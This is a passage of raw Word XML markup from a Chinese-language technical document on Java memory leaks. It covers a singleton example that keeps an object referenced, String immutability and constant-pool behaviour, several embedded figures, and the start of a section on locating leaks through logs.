          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，考虑下面的例子：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>class A{</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>public A(){</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>B.getInstance().setA(this);}</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>....}</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>//B</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类采用</w:t>
      </w:r>
      <w:hyperlink r:id="rId86" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00DD3DCC">
          <w:rPr>
            <w:color w:val="000000"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>单例模式</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>class B{</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>private A a;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>private static B instance=new B();</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>public B(){}</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>public static B getInstance(){</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>return instance;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009513C7" w:rsidRPr="00F41A4C" w:rsidRDefault="009513C7" w:rsidP="009513C7">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r w:rsidR="00122671">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导致的内存</w:t>
      </w:r>
      <w:r w:rsidR="004F219B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泄漏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB5236" w:rsidRDefault="00BB5236" w:rsidP="00BB5236">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="916"/>
          <w:tab w:val="left" w:pos="495"/>
        </w:tabs>
        <w:spacing w:after="107" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象的特点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB5236" w:rsidRDefault="00BB5236" w:rsidP="00BB5236">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="916"/>
          <w:tab w:val="left" w:pos="495"/>
        </w:tabs>
        <w:spacing w:after="107" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>不变性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象一旦生成，则不能再对它进行改变。因为对象不可变，所以对于所有线</w:t>
      </w:r>
      <w:r w:rsidR="009F4FCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>程都是只读的，多线程访问时，即使不加同步也不会产生数据的不一致。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB5236" w:rsidRDefault="00BB5236" w:rsidP="00BB5236">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="916"/>
          <w:tab w:val="left" w:pos="495"/>
        </w:tabs>
        <w:spacing w:after="107" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>针对常量池的优化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB5236" w:rsidRDefault="00BB5236" w:rsidP="00BB5236">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="916"/>
          <w:tab w:val="left" w:pos="495"/>
        </w:tabs>
        <w:spacing w:after="107" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB5236" w:rsidRDefault="009F4FCC" w:rsidP="009F4FCC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="916"/>
          <w:tab w:val="left" w:pos="495"/>
        </w:tabs>
        <w:spacing w:after="107" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2825453"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="24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7" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2825453"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E14B2D" w:rsidRDefault="00390922" w:rsidP="009F4FCC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="916"/>
          <w:tab w:val="left" w:pos="495"/>
        </w:tabs>
        <w:spacing w:after="107" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2980798"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="24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8" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2980798"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E14B2D" w:rsidRDefault="00E14B2D" w:rsidP="009F4FCC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="916"/>
          <w:tab w:val="left" w:pos="495"/>
        </w:tabs>
        <w:spacing w:after="107" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2744603"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="7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9" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2744603"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E14B2D" w:rsidRDefault="0075356F" w:rsidP="009F4FCC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="916"/>
          <w:tab w:val="left" w:pos="495"/>
        </w:tabs>
        <w:spacing w:after="107" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3531589"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="204"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0" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3531589"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E14B2D" w:rsidRDefault="0075356F" w:rsidP="009F4FCC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="916"/>
          <w:tab w:val="left" w:pos="495"/>
        </w:tabs>
        <w:spacing w:after="107" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3198355"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="205"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1" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3198355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075356F" w:rsidRDefault="0075356F" w:rsidP="009F4FCC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="916"/>
          <w:tab w:val="left" w:pos="495"/>
        </w:tabs>
        <w:spacing w:after="107" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2024450"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="214"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2" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2024450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB5236" w:rsidRPr="0062446E" w:rsidRDefault="00B05BEB" w:rsidP="0062446E">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r w:rsidR="00122671">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="0062446E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存泄漏定位</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C711E" w:rsidRDefault="000C711E" w:rsidP="000C711E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="353" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="EE6600"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>日志对于分析内存溢出是非常重要的，通过仔细</w:t>
      </w:r>
      <w:r>
        <w:rPr>
